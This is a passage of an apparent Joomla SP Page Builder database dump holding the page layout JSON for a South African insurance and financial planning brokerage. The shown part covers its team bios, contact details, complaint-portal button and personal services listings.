financial solutions.</li><li>care about your financial planning.</li></ul>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1}],\"collapse\":\"\",\"title\":\"Row\"},{\"layout\":\"4,4,4\",\"settings\":{\"heading_selector\":\"h2\",\"title\":\"Meet the Team\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"Our business is committed to personal service and we like to familiarise our clients with the people who handle their affairs at our office.\",\"subtitle_fontsize\":\"\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"25px 0\",\"margin\":\"0 0 0 0\",\"fullscreen\":0},\"id\":1496652263,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1496652264,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1496652265,\"settings\":{\"admin_label\":\"Ferdie Smith\",\"title\":\"Ferdie Smith\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"company-position\\\">Founder</div><p>Ferdie has been a top producer for major insurers where he has earned a number of awards and accolades over the years. He has been in his own brokerage since 1981 and specialised in corporate solutions. In the late nineties he took a four-year sabbatical to follow a lifelong dream of big game hunting in Africa. He has since returned to the financial industry, where he has once again established a reputable name in this field.</p><div class=\\\"contact-details\\\"><div class=\\\"telephone\\\">C: 083 653 8553</div><div class=\\\"fax\\\">F: 086 611 9922</div><div class=\\\"email\\\">E: <a href=\\\"mailto:ferdie@smithandsmith.co.za\\\" data-mce-href=\\\"mailto:ferdie@smithandsmith.co.za\\\">ferdie@smithandsmith.co.za</a><br></div></div>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1496652266,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1496652267,\"settings\":{\"admin_label\":\"Shirely Smith\",\"title\":\"Shirley Smith\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"company-position\\\">Founder</div><p>Shirley has 30 years’ experience in the financial services industry in various marketing positions, where she has won various awards. Shirley started her own business in 1995 and has since operated independently in the financial services industry. Her knowledge is extensive in terms of corporate compliance, healthcare, employee benefits, asset structuring, trusts and general products.</p><div class=\\\"contact-details\\\"><div class=\\\"telephone\\\">C: 083 657 1912<br></div><div class=\\\"fax\\\">F: 086 512 2530<br></div><div class=\\\"email\\\">E: <a href=\\\"mailto:ferdie@smithandsmith.co.za\\\" data-mce-href=\\\"mailto:ferdie@smithandsmith.co.za\\\">shirley@smithandsmith.co.za</a><br data-mce-bogus=\\\"1\\\"></div></div>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1496652268,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1496652269,\"settings\":{\"admin_label\":\"Prabash Naidoo\",\"title\":\"Prabash Naidoo\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"company-position\\\">General Manager</div><p>Prabash has been with the business for 20 years and has developed an extensive knowledge of our industry. We value her reliable work ethic and calm, collected attitude. She knows the ins and outs of every part of the business. Although she deals primarily with life assurance and employee benefits, she can assist in all our departments when necessary.</p><div class=\\\"contact-details\\\"><div class=\\\"telephone\\\">C: 083 228 1815<br></div><div class=\\\"fax\\\">F: 086 601 2757<br></div><div class=\\\"email\\\">E: <a href=\\\"mailto:ferdie@smithandsmith.co.za\\\" data-mce-href=\\\"mailto:ferdie@smithandsmith.co.za\\\">prabash@smithandsmith.co.za</a><br data-mce-bogus=\\\"1\\\"></div></div>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":false}],\"visibility\":1}],\"collapse\":\"\",\"title\":\"Row\"},{\"layout\":\"6,6\",\"settings\":{\"title\":\"\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"25px 0\",\"margin\":\"0 0 0 0\",\"fullscreen\":0},\"id\":1496652270,\"visibility\":1,\"columns\":[{\"class_name\":\"col-md-6\",\"settings\":{},\"id\":1496652271,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1496652281,\"settings\":{\"admin_label\":\"Christine Muthusamy\",\"title\":\"Christine Muthusamy\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"company-position\\\">Administration<br></div><p>Christine is based in our Johannesburg office, and focuses on administration duties. Christine shares the same work ethic as her mother Prabash, and can be found in the office before 7 every morning. Christine emphasizes the belief that behind the scenes you need a strong support base in order to build success.</p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":false}],\"visibility\":1},{\"class_name\":\"col-md-6\",\"settings\":{},\"id\":1496652273,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1496652274,\"settings\":{\"admin_label\":\"Rebecca Naidoo (Becky) \",\"title\":\"Rebecca Naidoo (Becky) \",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"company-position\\\">Healthcare administrator </div><p>Rebecca is Prabash’s daughter and is fondly referred to as “Little Prabash”, since she embodies her mother’s work ethic and capabilities. She does her best to make it easier for clients to deal with all the red tape in healthcare. She has real empathy for people’s circumstances, as she deals with their health issues on a daily basis.</p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1}],\"collapse\":\"\",\"title\":\"Row\"}]','com_sppagebuilder','page',0,0,1,0,1,0,'2016-10-29 01:34:35',309,'2021-10-13 08:35:48',309,0,'0000-00-00 00:00:00','[]','Smith and Smith','images/smith-and-smith-images-personal-solutions.jpg','Smith and Smith - healthcare, short-term insurance, investment planning and life assurance','*',14548,''),(8,232,'Contact us','[{\"layout\":\"4,4,4\",\"settings\":{\"fullscreen\":0,\"margin\":\"0 0 0 0\",\"padding\":\"25px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_position\":\"0 0\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"background_repeat\":\"no-repeat\",\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"heading_selector\":\"h3\",\"title\":\"\",\"columns_align_center\":0,\"no_gutter\":0},\"id\":1496652177,\"visibility\":1,\"columns\":[{\"class_name\":\"col-md-4\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":300,\"animationdelay\":0,\"class\":\"\"},\"id\":1496652187,\"addons\":[{\"id\":1550750929560,\"name\":\"empty_space\",\"visibility\":true,\"settings\":{\"admin_label\":\"\",\"gap\":{\"md\":\"20\",\"sm\":30,\"xs\":20},\"class\":\"\",\"global_background_type\":\"none\",\"global_background_gradient\":{\"color\":\"#00c6fb\",\"color2\":\"#005bea\",\"deg\":\"45\",\"type\":\"linear\"},\"global_use_overlay\":0,\"global_background_repeat\":\"no-repeat\",\"global_background_size\":\"cover\",\"global_background_attachment\":\"inherit\",\"global_user_border\":0,\"global_border_width\":\"\",\"global_border_radius\":0,\"global_margin\":{\"md\":\"0 0 30px 0\",\"sm\":\"0 0 20px 0\",\"xs\":\"0 0 10px 0\"},\"global_padding\":\"\",\"global_boxshadow\":\"0 0 0 0 #ffffff\",\"global_use_animation\":0,\"global_animationduration\":\"300\",\"global_animationdelay\":\"0\",\"global_custom_css\":\"\",\"use_global_width\":\"0\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"acl\":\"\"}},{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1496652182,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"textwidget\\\"><p><strong>T: </strong>+27 (0)11 958 2445<br> <strong>F:</strong> +27 (0)11 958 2177</p></div>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1},{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1496652186,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p class=\\\"last\\\"><strong>Postal address</strong><br> P.O. Box 139<br> Florida Hills<br> 1716</p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"id\":1550750929554,\"class_name\":\"col-md-4\",\"visibility\":true,\"settings\":{},\"addons\":[{\"id\":1550750929566,\"name\":\"empty_space\",\"visibility\":true,\"settings\":{\"admin_label\":\"\",\"gap\":{\"md\":\"20\",\"sm\":30,\"xs\":20},\"class\":\"\",\"global_background_type\":\"none\",\"global_background_gradient\":{\"color\":\"#00c6fb\",\"color2\":\"#005bea\",\"deg\":\"45\",\"type\":\"linear\"},\"global_use_overlay\":0,\"global_background_repeat\":\"no-repeat\",\"global_background_size\":\"cover\",\"global_background_attachment\":\"inherit\",\"global_user_border\":0,\"global_border_width\":\"\",\"global_border_radius\":0,\"global_margin\":{\"md\":\"0 0 30px 0\",\"sm\":\"0 0 20px 0\",\"xs\":\"0 0 10px 0\"},\"global_padding\":\"\",\"global_boxshadow\":\"0 0 0 0 #ffffff\",\"global_use_animation\":0,\"global_animationduration\":\"300\",\"global_animationdelay\":\"0\",\"global_custom_css\":\"\",\"use_global_width\":\"0\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"acl\":\"\"}},{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1496652184,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p><strong>Physical address<br /></strong>Bergzicht Office Park<br />Office no 24, Unit 4<br />First Floor<br />5 Kudu Street (Corner Rooibok)<br />Allensnek<br />Roodepoort</p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\",\"dropcap\":0},\"visibility\":1}]},{\"id\":1550750929555,\"class_name\":\"col-md-4\",\"visibility\":true,\"settings\":{},\"addons\":[{\"id\":1627397823777,\"name\":\"empty_space\",\"visibility\":true,\"settings\":{\"admin_label\":\"\",\"gap\":{\"md\":\"20\",\"sm\":30,\"xs\":20},\"class\":\"\",\"global_background_type\":\"none\",\"global_background_gradient\":{\"color\":\"#00c6fb\",\"color2\":\"#005bea\",\"deg\":\"45\",\"type\":\"linear\"},\"global_use_overlay\":0,\"global_background_repeat\":\"no-repeat\",\"global_background_size\":\"cover\",\"global_background_attachment\":\"inherit\",\"global_user_border\":0,\"global_border_width\":\"\",\"global_border_radius\":0,\"global_margin\":{\"md\":\"0 0 30px 0\",\"sm\":\"0 0 20px 0\",\"xs\":\"0 0 10px 0\"},\"global_padding\":\"\",\"global_boxshadow\":\"0 0 0 0 #ffffff\",\"global_use_animation\":0,\"global_animationduration\":\"300\",\"global_animationdelay\":\"0\",\"global_custom_css\":\"\",\"use_global_width\":\"0\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"acl\":\"\"}},{\"id\":1627397823774,\"name\":\"button\",\"visibility\":true,\"settings\":{\"admin_label\":\"\",\"text\":\"Lodge a Complaint\",\"alignment\":\"sppb-text-left\",\"letterspace\":\"0\",\"type\":\"danger\",\"appearance\":\"\",\"fontsize\":{\"md\":16},\"button_status\":\"normal\",\"background_color\":\"#03E16D\",\"background_gradient\":{\"color\":\"#B4EC51\",\"color2\":\"#429321\",\"deg\":\"45\",\"type\":\"linear\"},\"color\":\"#FFFFFF\",\"background_color_hover\":\"#00E66E\",\"background_gradient_hover\":{\"color\":\"#429321\",\"color2\":\"#B4EC51\",\"deg\":\"45\",\"type\":\"linear\"},\"color_hover\":\"#FFFFFF\",\"link_button_status\":\"normal\",\"link_button_color\":\"\",\"link_button_border_width\":\"\",\"link_border_color\":\"\",\"link_button_padding_bottom\":\"\",\"link_button_hover_color\":\"\",\"link_button_border_hover_color\":\"\",\"button_padding\":\"\",\"icon_margin\":{\"md\":\"0px 0px 0px 0px\",\"sm\":\" \",\"xs\":\" \"},\"icon_position\":\"left\",\"class\":\"\",\"global_background_type\":\"none\",\"global_background_gradient\":{\"color\":\"#00c6fb\",\"color2\":\"#005bea\",\"deg\":\"45\",\"type\":\"linear\"},\"global_background_image\":{\"src\":\"\"},\"global_background_repeat\":\"no-repeat\",\"global_background_size\":\"cover\",\"global_background_attachment\":\"inherit\",\"global_background_position\":\"50% 50%\",\"global_use_overlay\":0,\"global_overlay_type\":\"overlay_none\",\"global_gradient_overlay\":{\"color\":\"rgba(127, 0, 255, 0.8)\",\"color2\":\"rgba(225, 0, 255, 0.7)\",\"deg\":\"45\",\"type\":\"linear\"},\"global_pattern_overlay\":{\"src\":\"\"},\"global_overlay_pattern_color\":\"\",\"blend_mode\":\"normal\",\"global_user_border\":0,\"global_border_width\":\"\",\"global_border_radius\":0,\"global_margin\":{\"md\":\"0px 0px 30px 0px\",\"sm\":\"\",\"xs\":\"\"},\"global_padding\":\"\",\"global_boxshadow\":\"0 0 0 0 #ffffff\",\"global_use_animation\":0,\"global_animationduration\":\"300\",\"global_animationdelay\":\"0\",\"global_custom_css\":\"\",\"global_custom_position\":0,\"global_seclect_position\":\"relative\",\"global_addon_position_left\":{\"unit\":\"px\"},\"global_addon_position_top\":{\"unit\":\"px\"},\"use_global_width\":\"0\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"acl\":\"\",\"while_scroll_view\":[{\"enable_while_scroll_view\":0,\"on_scroll_actions\":[{\"id\":\"b3fdc1c1e6bfde5942ea\",\"index\":0,\"keyframe\":0,\"name\":\"move\",\"property\":{\"x\":\"0\",\"y\":\"-100\",\"z\":\"0\"},\"range\":{\"max\":500,\"min\":-500,\"stop\":1},\"single\":true,\"title\":\"Move\"},{\"id\":\"936e0225e6dc8edfba7d\",\"index\":1,\"keyframe\":100,\"name\":\"move\",\"property\":{\"x\":0,\"y\":0,\"z\":0},\"range\":{\"max\":500,\"min\":-500,\"stop\":1},\"single\":true,\"title\":\"Move\"}],\"transition_origin_x\":\"center\",\"transition_origin_y\":\"center\",\"enable_tablet\":0,\"enable_mobile\":0}],\"mouse_movement\":[{\"enable_tilt_effect\":0,\"mouse_tilt_direction\":\"direct\",\"mouse_tilt_speed\":\"1\",\"mouse_tilt_max\":\"15\",\"enable_tablet\":0,\"enable_mobile\":0}],\"url\":\"https://complaints.go4software.co.za/yourComplaints.php?tokenID=8&token=db0e217c51ca964a3cea01c18\",\"target\":\"_blank\",\"block\":\"\"}}]}],\"collapse\":\"\",\"title\":\"Row\"},{\"layout\":\"4,4,4\",\"settings\":{\"fullscreen\":0,\"margin\":\"0 0 25px 0\",\"padding\":\"25px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"id\":1496652196,\"visibility\":1,\"columns\":[{\"class_name\":\"col-md-4\",\"settings\":{},\"id\":1496652197,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1496652198,\"settings\":{\"admin_label\":\"Ferdie Smith\",\"title\":\"Ferdie Smith\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"contact-details\\\"><div class=\\\"telephone\\\">C: 083 653 8553</div><div class=\\\"fax\\\">F: 086 611 9922</div><div class=\\\"email\\\">E: <a href=\\\"mailto:ferdie@smithandsmith.co.za\\\" data-mce-href=\\\"mailto:ferdie@smithandsmith.co.za\\\">ferdie@smithandsmith.co.za</a><br data-mce-bogus=\\\"1\\\"></div></div>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-md-4\",\"settings\":{},\"id\":1496652199,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1496652200,\"settings\":{\"admin_label\":\"Shirely Smith\",\"title\":\"Shirley Smith\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"contact-details\\\"><div class=\\\"telephone\\\">C: 083 657 1912<br></div><div class=\\\"fax\\\">F: 086 512 2530<br></div><div class=\\\"email\\\">E: <a href=\\\"mailto:ferdie@smithandsmith.co.za\\\" data-mce-href=\\\"mailto:ferdie@smithandsmith.co.za\\\">shirley@smithandsmith.co.za</a><br data-mce-bogus=\\\"1\\\"></div></div>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-md-4\",\"settings\":{},\"id\":1496652201,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1496652202,\"settings\":{\"admin_label\":\"Prabash Naidoo\",\"title\":\"Prabash Naidoo\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"contact-details\\\"><div class=\\\"telephone\\\">C: 083 228 1815<br></div><div class=\\\"fax\\\">F: 086 601 2757<br></div><div class=\\\"email\\\">E: <a href=\\\"mailto:ferdie@smithandsmith.co.za\\\" data-mce-href=\\\"mailto:ferdie@smithandsmith.co.za\\\">prabash@smithandsmith.co.za</a><br data-mce-bogus=\\\"1\\\"></div></div>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1},{\"type\":\"content\",\"name\":\"module\",\"title\":\"Joomla Module\",\"id\":1496652204,\"settings\":{\"admin_label\":\"Contact Form\",\"title\":\"Contact Form\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"module_type\":\"module\",\"id\":\"111\",\"position\":\"\",\"class\":\"\"},\"visibility\":false}],\"visibility\":1}],\"collapse\":\"\",\"title\":\"Row\"}]','com_sppagebuilder','page',0,0,1,0,1,0,'2016-10-28 21:34:35',309,'2021-07-27 15:03:35',309,0,'0000-00-00 00:00:00','[]','','','','*',21632,''),(9,235,'Personal Solutions','[{\"layout\":\"4,8\",\"settings\":{\"title_position\":\"sppb-text-left\",\"heading_selector\":\"h1\",\"fullscreen\":0,\"margin\":\"25px 0 0 0\",\"padding\":\"25px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"title\":\"Personal Solutions\"},\"id\":1572122085,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-8\",\"settings\":{},\"id\":1572122086,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122087,\"settings\":{\"admin_label\":\"Personal Solutions\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>Smith & Smith provides personal solutions covering everything that is required for you to live your life without having to worry about the “what ifs”. With our easy-to-understand approach, we offer complete solutions that fit your individual needs and circumstances.</p><p>We regularly take clients’ portfolios under review to ensure that premiums and products are market-related and that assets are insured at true market value. In the event of a claim, the emphasis is always on finalising the paperwork as swiftly as possible.</p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\",\"dropcap\":0},\"visibility\":1},{\"type\":\"inner_row\",\"layout\":\"4,4,4\",\"disable\":false,\"settings\":{},\"id\":1572122088,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-4\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"services-block\"},\"id\":1572122089,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122090,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>- Life assurance<br>- Indemnity insurance<br>- Domestic short-term insurance<br>- Vehicle insurance</p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1572122091,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122092,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>- Investments<br>- Retirement planning<br>- Drafting of legal agreements,<br>e.g. buy & sell agreements<br></p>\",\"alignment\":\"sppb-text-left\",\"class\":\"services-block\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1572122093,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122094,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>- Healthcare for individuals & families<br>- Corporate Wellness<br>- Funeral Cover<br>- Wills<br></p>\",\"alignment\":\"sppb-text-left\",\"class\":\"services-block\"},\"visibility\":1}],\"visibility\":1}]}],\"visibility\":1},{\"class_name\":\"col-sm-4 active-column-parent\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"\"},\"id\":1572122095,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122096,\"settings\":{\"admin_label\":\"Quote Block\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"quote-block\\\"><div><div class=\\\"left\\\"><img src=\\\"images/quote-marks-left.png\\\" alt=\\\"left-quotation\\\" data-mce-src=\\\"images/quote-marks-left.png\\\" width=\\\"36\\\" height=\\\"28\\\"></div></div>We aim to negotiate the best settlements, because we commit to championing each client’s cause<div><div class=\\\"quote-right\\\"><img src=\\\"images/quote-marks-right.png\\\" alt=\\\"quotation-right\\\" data-mce-src=\\\"images/quote-marks-right.png\\\" width=\\\"36\\\" height=\\\"28\\\"></div></div></div>\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1}],\"collapse\":\"\",\"title\":\"Row\"},{\"layout\":\"4,4,4\",\"settings\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"fixed\",\"background_position\":\"0 0\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"25px 0\",\"margin\":\"25px 0\",\"fullscreen\":0},\"id\":1572122097,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-4\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":300,\"animationdelay\":0,\"class\":\"\"},\"id\":1572122098,\"addons\":[{\"type\":\"content\",\"name\":\"image\",\"title\":\"Image\",\"id\":1572122099,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/services-short-term-insurance.jpg\",\"alt_text\":\"Short term car and personal insurance\",\"position\":\"sppb-text-center\",\"link\":\"http://\",\"target\":\"\",\"class\":\"\",\"open_lightbox\":0},\"visibility\":1},{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122100,\"settings\":{\"admin_label\":\"Short-term Insurance\",\"title\":\"Short-term Insurance\",\"heading_selector\":\"h2\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p class=\\\"descriptor\\\">Get insured for life’s surprises</p><p>Affordable domestic cover for buildings, cars, jet skis, cellular phones, laptops, cameras, house contents and in general all the “stuff” you own that are valuable and need to be properly insured if you want to receive a payout when you need it.</p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1},{\"type\":\"general\",\"name\":\"button\",\"title\":\"Button\",\"id\":1572122101,\"settings\":{\"admin_label\":\"Contact us Button\",\"text\":\"Contact us\",\"url\":\"index.php/contact\",\"size\":\"xs\",\"type\":\"danger\",\"icon\":\"\",\"target\":\"\",\"block\":\"sppb-btn-block\",\"margin\":\"\",\"class\":\"\"},\"visibility\":1},{\"type\":\"content\",\"name\":\"empty_space\",\"title\":\"Empty Space\",\"id\":1572122102,\"settings\":{\"admin_label\":\"\",\"gap\":\"30\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1572122103,\"addons\":[{\"type\":\"content\",\"name\":\"image\",\"title\":\"Image\",\"id\":1572122104,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/services-medical-aid.jpg\",\"alt_text\":\"Medical insurance and medical aid from Smith & Smith\",\"position\":\"sppb-text-center\",\"link\":\"http://\",\"target\":\"\",\"class\":\"\",\"open_lightbox\":0},\"visibility\":1},{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122105,\"settings\":{\"admin_label\":\"Medical Insurance\",\"title\":\"Medical Insurance\",\"heading_selector\":\"h2\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p class=\\\"descriptor\\\">Live well, be well</p><p>Smith & Smith helps clients to get the individual attention they deserve with comprehensive medical aid cover that suits their needs and budget.</p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1},{\"type\":\"general\",\"name\":\"button\",\"title\":\"Button\",\"id\":1572122106,\"settings\":{\"admin_label\":\"Contact us Button\",\"text\":\"Contact 